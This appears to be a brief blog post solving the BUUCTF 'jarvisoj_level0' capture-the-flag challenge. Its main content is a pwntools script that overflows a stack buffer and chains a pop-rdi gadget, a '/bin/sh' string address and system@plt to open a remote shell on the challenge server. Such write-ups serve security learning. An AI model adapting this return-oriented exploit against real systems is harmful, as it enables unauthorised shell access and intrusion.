BUUCTF jarvisoj_level0

在這裏插入圖片描述
exp

from pwn import *

context(log_level='debug', arch='amd64')

p = remote('node3.buuoj.cn', 26990)
proc_name = './level0'
# p = process(proc_name)
# elf = p.elf
elf = ELF(proc_name)
bin_sh_str = 0x400684
system_plt = elf.plt['system']
pop_rdi_ret = 0x400663
print(system_plt)
payload = 'a'.encode() * (0x80 + 8) + p64(pop_rdi_ret) + p64(bin_sh_str) + p64(system_plt)
p.sendline(payload)
p.interactive()

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章